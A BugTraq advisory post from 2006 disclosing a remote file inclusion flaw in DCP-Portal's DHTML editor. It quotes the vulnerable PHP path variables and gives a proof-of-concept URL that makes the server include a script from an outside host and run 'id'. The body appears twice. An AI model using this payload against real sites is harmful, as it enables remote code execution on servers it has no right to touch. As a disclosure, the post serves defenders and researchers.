BugTraq
Back to list
|
Post reply
[Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML]
Jun 13 2006 08:30AM
botan linuxmail org
# Kurdish Security Advisory
# irc.gigachat.net #kurdhack
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz
$url_path_editor = "$root_url/library/editor/";
$abs_path_editor = "$root/library/editor/";
?>
Proof Of Concept
http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.y
ourscripts.com/x.txt?cmd=id
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
# irc.gigachat.net #kurdhack
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz
$url_path_editor = "$root_url/library/editor/";
$abs_path_editor = "$root/library/editor/";
?>
Proof Of Concept
http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.y
ourscripts.com/x.txt?cmd=id
[ reply ]